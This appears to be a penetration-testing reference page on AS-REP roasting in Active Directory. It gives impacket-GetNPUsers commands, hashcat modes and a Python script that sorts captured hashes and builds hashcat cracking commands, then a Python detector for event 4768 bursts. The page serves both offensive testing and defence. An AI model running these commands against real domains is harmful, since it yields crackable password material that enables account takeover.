AS-REP Roast
Request an AS-REP (the KDC's reply to an AS-REQ, carrying the TGT) for AD accounts that have "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH in userAccountControl) set. Because preauth is off, the KDC hands the reply to anyone who names the account; its enc-part is encrypted with a key derived from the user's password, so it can be cracked offline without ever sending a password guess to the DC.
| Action | Command |
|---|---|
| Request AS-REPs for a user list (no creds; names without the flag, or that don't exist, are reported rather than roasted) | impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep.hashes |
| Single user (no creds) | impacket-GetNPUsers <domain>/<user> -no-pass -dc-ip <dc_ip> -format hashcat |
| With valid creds (enumerate flagged accounts over LDAP, then request each AS-REP) | impacket-GetNPUsers <domain>/<user>:'<password>' -dc-ip <dc_ip> -request -format hashcat -outputfile asrep.hashes |
Crack With Hashcat
- Identify the etype from the prefix of each line in asrep.hashes ($krb5asrep$23$, $krb5asrep$17$ or $krb5asrep$18$) and pass the matching mode to hashcat with -m. The AES AS-REP modes (32100/32200) need hashcat 6.2.6 or later; 19800 and 19900 are the Kerberos 5 Pre-Auth (AS-REQ timestamp) modes and will not accept AS-REP hashes.

| AS-REP etype | Hashcat mode | Hash format as emitted by GetNPUsers -format hashcat (starts like…) |
|---|---|---|
| RC4-HMAC (etype 23) | 18200 | $krb5asrep$23$user@REALM.LOCAL:<32 hex chars, the HMAC-MD5 checksum>$<hex ciphertext> |
| AES128-CTS-HMAC-SHA1-96 (etype 17) | 32100 | $krb5asrep$17$user$REALM.LOCAL$<24 hex chars, the HMAC-SHA1-96 checksum>$<hex ciphertext> |
| AES256-CTS-HMAC-SHA1-96 (etype 18) | 32200 | $krb5asrep$18$user$REALM.LOCAL$<24 hex chars, the HMAC-SHA1-96 checksum>$<hex ciphertext> |
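A run over a user list usually yields a mix of etypes in one output file, and hashcat takes a single -m per invocation. The script below is an added example (not impacket or hashcat code): it recognises the three hashcat-format prefixes, splits the lines into one file per mode and prints the matching hashcat command line. The sample hashes are constructed (made-up hex of the right length, not real AS-REPs); the file names asrep.<mode>.txt and the rockyou.txt wordlist are assumptions. Lines in john format (no etype after $krb5asrep$) are skipped, so re-run GetNPUsers with -format hashcat if you see them.

```python
#!/usr/bin/env python3
"""Sort GetNPUsers -format hashcat output by etype and emit hashcat commands.

Added example, not part of impacket or hashcat. The SAMPLE lines are
constructed: the hex is filler of the correct length, not captured data.
"""
import re
import sys
from collections import defaultdict

# hashcat mode per AS-REP etype; 32100/32200 require hashcat >= 6.2.6
MODES = {23: 18200, 17: 32100, 18: 32200}

# RC4:  $krb5asrep$23$user@REALM:<32 hex checksum>$<hex ciphertext>
RC4_RE = re.compile(
    r"^\$krb5asrep\$23\$([^@$]+)@([^:$]+):([0-9a-f]{32})\$([0-9a-f]+)$", re.I)
# AES:  $krb5asrep$17|18$user$REALM$<24 hex checksum>$<hex ciphertext>
AES_RE = re.compile(
    r"^\$krb5asrep\$(17|18)\$([^$]+)\$([^$]+)\$([0-9a-f]{24})\$([0-9a-f]+)$", re.I)

# Constructed sample output (hypothetical CORP.LOCAL domain).
SAMPLE = [
    "$krb5asrep$23$svc_backup@CORP.LOCAL:00112233445566778899aabbccddeeff$" + "aabbccdd" * 8,
    "$krb5asrep$17$jsmith$CORP.LOCAL$00112233445566778899aabb$" + "cafebabe" * 8,
    "$krb5asrep$18$mlee$CORP.LOCAL$ffeeddccbbaa998877665544$" + "c0ffee00" * 8,
    "[-] User nopre doesn't have UF_DONT_REQUIRE_PREAUTH set",          # status line
    "$krb5asrep$mlee@CORP.LOCAL:00112233445566778899aabbccddeeff$" + "c0ffee00" * 8,  # john format
]


def parse_line(line):
    """Return (etype, user, realm) for a hashcat-format AS-REP line, else None."""
    line = line.strip()
    m = RC4_RE.match(line)
    if m:
        return 23, m.group(1), m.group(2)
    m = AES_RE.match(line)
    if m:
        return int(m.group(1)), m.group(2), m.group(3)
    return None  # status output or john-format line: nothing hashcat can take as-is


def bucket(lines):
    """Group the crackable lines by hashcat mode: {mode: [line, ...]}."""
    out = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            out[MODES[parsed[0]]].append(line.strip())
    return dict(out)


def hashcat_commands(buckets, wordlist="rockyou.txt", prefix="asrep"):
    """One straight wordlist (-a 0 is hashcat's default) command per mode, lowest mode first."""
    return [f"hashcat -m {mode} {prefix}.{mode}.txt {wordlist}" for mode in sorted(buckets)]


def write_buckets(buckets, prefix="asrep"):
    """Write each mode's hashes to <prefix>.<mode>.txt (assumed naming)."""
    for mode, lines in buckets.items():
        with open(f"{prefix}.{mode}.txt", "w") as fh:
            fh.write("\n".join(lines) + "\n")


if __name__ == "__main__":
    # Usage: python3 split_asrep.py asrep.hashes   (falls back to SAMPLE without an argument)
    src = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE
    buckets = bucket(src)
    write_buckets(buckets)
    for cmd in hashcat_commands(buckets):
        print(cmd)
```

The regexes pin the checksum length (16 bytes for RC4's HMAC-MD5, 12 bytes for AES's HMAC-SHA1-96), which is what separates a real AS-REP line from a truncated or wrapped one before it reaches hashcat and is rejected as "Token length exception".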
Notes
- Which etype you get depends on the account's msDS-SupportedEncryptionTypes and domain policy. RC4 (etype 23) is far cheaper to crack than AES (17/18), so tools ask for RC4 first where the DC still allows it; if the DC or the account refuses RC4 you get an AES reply and should budget crack time accordingly.
- Every AS-REQ, successful or not, is logged on the DC as Security event 4768 (a Kerberos authentication ticket (TGT) was requested). An AS-REP roast shows up as 4768 with Pre-Authentication Type 0 and Result Code 0x0, and a user-list run produces a burst of them from one source address, usually mixed with 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) failures for names that do not exist. Scope operations appropriately.
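The detection side of that last note, as an added example rather than anything from a vendor product: it runs over a handful of constructed 4768 records (flattened to one key=value line each, not real EVTX/XML; the field names mirror the event's TargetUserName, IpAddress, PreAuthType, TicketEncryptionType and Status, the timestamps and addresses are made up), keeps only the events where an AS-REP was actually issued without preauth, and alerts on any source that collected replies for several distinct accounts inside a short window. A single such event for an account that legitimately has preauth disabled is normal and should be baselined, which is why the alert is per source and counts distinct accounts.

```python
#!/usr/bin/env python3
"""Flag AS-REP roasting in Security event 4768 records.

Added example, not taken from any SIEM or vendor rule. SAMPLE_EVENTS is a
constructed, flattened rendering of 4768 (one key=value line per event),
not the Windows XML; timestamps, names and addresses are made up.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

SAMPLE_EVENTS = """\
2024-05-02T10:15:01Z EventID=4768 TargetUserName=svc_backup IpAddress=::ffff:10.0.0.55 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2024-05-02T10:15:01Z EventID=4768 TargetUserName=jsmith IpAddress=::ffff:10.0.0.55 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
2024-05-02T10:15:02Z EventID=4768 TargetUserName=mlee IpAddress=::ffff:10.0.0.55 PreAuthType=0 TicketEncryptionType=0x12 Status=0x0
2024-05-02T10:15:02Z EventID=4768 TargetUserName=nobody IpAddress=::ffff:10.0.0.55 PreAuthType=0 TicketEncryptionType=0xffffffff Status=0x6
2024-05-02T10:20:00Z EventID=4768 TargetUserName=admin IpAddress=::ffff:10.0.0.7 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0
2024-05-02T11:00:00Z EventID=4768 TargetUserName=legacy_svc IpAddress=::ffff:10.0.0.9 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0
"""


def parse_event(line):
    """Parse one flattened record into a dict; the leading timestamp becomes ev['ts']."""
    ts, _, rest = line.strip().partition(" ")
    ev = dict(kv.split("=", 1) for kv in rest.split())
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ev


def asrep_without_preauth(ev):
    """True only when the DC really handed out an AS-REP with no pre-authentication:
    event 4768, Pre-Authentication Type 0 and Result Code 0x0. Failures such as
    0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) give the attacker nothing to crack, so they
    are left out of the count (they are still useful corroborating noise)."""
    return (ev.get("EventID") == "4768"
            and ev.get("PreAuthType") == "0"
            and ev.get("Status") == "0x0")


def detect(lines, threshold=3, window=timedelta(minutes=5)):
    """Alert per source IP that obtained AS-REPs for >= threshold distinct accounts
    within `window`. Returns [(ip, sorted account names, number of RC4 replies)].
    RC4 (0x17) replies are counted separately because they are the cheap ones to crack."""
    by_ip = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if asrep_without_preauth(ev):
            by_ip[ev["IpAddress"]].append(ev)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):  # sliding window anchored on each event
            hits = [e for e in evs[i:] if e["ts"] - start["ts"] <= window]
            users = sorted({e["TargetUserName"] for e in hits})
            if len(users) >= threshold:
                rc4 = sum(1 for e in hits if e["TicketEncryptionType"].lower() == "0x17")
                alerts.append((ip, users, rc4))
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for ip, users, rc4 in detect(SAMPLE_EVENTS.splitlines()):
        print(f"AS-REP roast suspected from {ip}: {len(users)} accounts ({', '.join(users)}), {rc4} RC4 replies")
```

On the sample, 10.0.0.55 trips the rule (three accounts in one second, two of them RC4), 10.0.0.7 is a normal preauthenticated logon and 10.0.0.9 is a lone no-preauth account that belongs in the baseline, not the alert. Tune threshold and window to the size of the environment; the attacker's side of this page shows why a usersfile run is bursty.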